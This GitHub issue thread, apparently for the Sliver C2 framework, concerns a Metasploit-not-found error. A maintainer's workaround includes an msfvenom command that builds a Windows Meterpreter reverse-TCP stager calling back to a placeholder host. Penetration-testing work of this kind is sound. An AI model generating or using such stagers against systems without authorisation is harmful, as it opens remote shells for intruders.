Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Error: rpc error: code = Unknown desc = exit status 1 - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH #1580

Closed
maddsec opened this issue Feb 11, 2024 · 2 comments

Comments

@maddsec
Copy link

maddsec commented Feb 11, 2024

Hi there..

I think the picture is self explanatory and I have no idea what's going on

image

@moloch--
Copy link
Member

Check the logs for a more specific error message, should be in /root/.sliver/logs/sliver.log

@rkervella
Copy link
Member

Not the first time I've seen this, there are duplicate issues and it seems to be specific to Kali. As a workaround you can use msfvenom to generate a stager like this:

msfvenom LHOST=1.2.3.4 LPORT=8443 -p windows/x64/meterpreter/reverse_tcp  -f c -o /tmp/stager.c

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants